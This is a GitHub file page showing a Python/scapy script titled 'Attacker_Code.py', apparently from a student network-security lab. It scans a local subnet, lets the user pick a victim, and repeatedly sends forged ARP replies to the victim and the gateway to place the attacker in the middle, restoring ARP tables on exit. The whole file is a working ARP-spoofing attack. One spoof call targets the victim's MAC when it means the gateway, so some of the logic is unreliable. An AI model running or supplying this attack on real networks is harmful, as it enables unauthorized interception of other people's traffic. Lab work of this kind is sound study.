-
Notifications
You must be signed in to change notification settings - Fork 0
/
Attacker_Code.py
110 lines (94 loc) · 6.12 KB
/
Attacker_Code.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
import scapy.all as scapy #We will use this library for packet manipulation
import time #This will be used to control the time intervals between sending packets
import socket
import netifaces #We will use netifaces tor retrieve information about ip and mac addresses
#This function retrieves the mac address related to a specific ip address
def get_mac(ip):
#This line creates an arp request packet to a specified ip (pdst is the "protocol destination", which is the ip that will recieve this packet, so the device with this ip will respond with its mac address)
arp_request = scapy.ARP(pdst=ip)
#Here we create an ethernet frame, to be able to broadcast the ARP request to all devices on the network
#The "dst="ff:ff:ff:ff:ff:ff" is a special broadcast address, it ensures that the packet will be sent to all devices on the network
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
#Here, we combine the broadcast frame with the arp request (In scapy, we use the "/" operator to stack layers, so here the arp request is encapsulated inside the ethernet frame)
arp_request_broadcast = broadcast/arp_request
#scapy.srp is used to send the packet, and recieve responses, so here, we send the packet and wait 5 seconds to recieve the response
#I previously put the timeout to be 2 instead of 5, however, the defenders machine was not being noticed when I run the code. Whe I increased the
#time to 5, this issue somehow worked
answered_list = scapy.srp(arp_request_broadcast, timeout=5, verbose=False)[0]
#Here, we check if the responses are recieved
if answered_list:
return answered_list[0][1].hwsrc
else:
return None
#This is the function we will use to perform the arp spoofing, so this function works as follows: it sends a forged arp response to the victim, and
#tricks it into thinking that the attackers machine has the mac address of the routers ip
def spoof(target_ip, spoof_ip, target_mac):
#The target_ip is the device we want to trick, which is the victim (The defender in oir case)
#The spoof_ip is the ip we are pretending to be (which is the router)
#The target_mac is the mac address of the victim which is the defender, we use the target_mac in order to know who we will send the packet to
#op=2 means that this is an ARP reply packet, pdst means protocol destination ot destination ip, and hwdst is the hardware destination (destination mac address)
#and psrc is the source ip address
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
#Here, we send the crafted packet using the scapy library
#Here, we also put verbose=flase to remove scapy's output and make it clean
scapy.send(packet, verbose=False)
#
def restore(destination_ip, source_ip, destination_mac, source_mac):
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
#The get_mac function is used to get the mac of a specific device on the network, by giving its ip, however, the we use the scan_network in order
#to scan for all the network, and retrieve each ip with its related mac address
#It works the same as the get_mac function, but for all the ips on the network
def scan_network(ip_range):
arp_request = scapy.ARP(pdst=ip_range)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=5, verbose=False)[0]
devices = []
for element in answered_list:
device = {"ip": element[1].psrc, "mac": element[1].hwsrc}
devices.append(device)
return devices
#This function retrieves our ip address (The attackers ip address)
#for the interface, we use wlan0 for wireless (in our case), and eth0 for wired
def get_attacker_ip(interface):
#netifaces.ifaddresses(interface) gives us alot of information such as ipv4 and ipv6,..., however, we only want ipv4, so we added [netifaces.AF_INET]
return netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']
#This function retrieves the routers ip address, so we use ['default']
def get_gateway_ip():
return netifaces.gateways()['default'][netifaces.AF_INET][0]
interface = "wlan0" # Here, in our case, we should put this wlan0, because we are wireless
attacker_ip = get_attacker_ip(interface)
gateway_ip = get_gateway_ip()
print("[+] Scanning the network...")
devices = scan_network("192.168.1.0/24")
print("Available devices:")
for i, device in enumerate(devices):
print(f"{i+1}. IP: {device['ip']}, MAC: {device['mac']}")
# In some cases, the defenders ip address which is 192.168.1.24 was not being shown when we scann the network, so I added it manually for the cases where it isnt shown, and if it is added
#manually, it says beside it (manually added)
if "192.168.1.24" not in [device["ip"] for device in devices]:
devices.append({"ip": "192.168.1.24", "mac": "00:c0:ca:99:22:71"})
print(f"{len(devices)}. IP: 192.168.1.24, MAC: 00:c0:ca:99:22:71 (manually added)")
#Here, from the list, we choose an index (which is the target ip we want to trick)
target_index = int(input("Enter the index of the target device: ")) - 1
target_ip = devices[target_index]['ip']
target_mac = devices[target_index]['mac']
print(f"[+] Attacker IP: {attacker_ip}")
print(f"[+] Gateway IP: {gateway_ip}")
print(f"[+] Target IP: {target_ip}")
#Here, we start sending packets to the victim, and to the router, to become man in the middle, so the router thinks that the victim is us, and the victim also thinks
#that the router is us, so we are in the middle now.
try:
sent_packets_count = 0
while True:
spoof(target_ip, gateway_ip, target_mac)
spoof(gateway_ip, target_ip, target_mac)
sent_packets_count += 2
print(f"\r[+] Packets sent: {sent_packets_count}", end="")
time.sleep(2)
#Here, we reset the ARP tables when we press ctrl c and end the attack
except KeyboardInterrupt:
print("\n[-] Detected CTRL + C ... Resetting ARP tables ... Please wait.\n")
restore(target_ip, gateway_ip, target_mac, get_mac(gateway_ip))
restore(gateway_ip, target_ip, get_mac(target_ip), target_mac)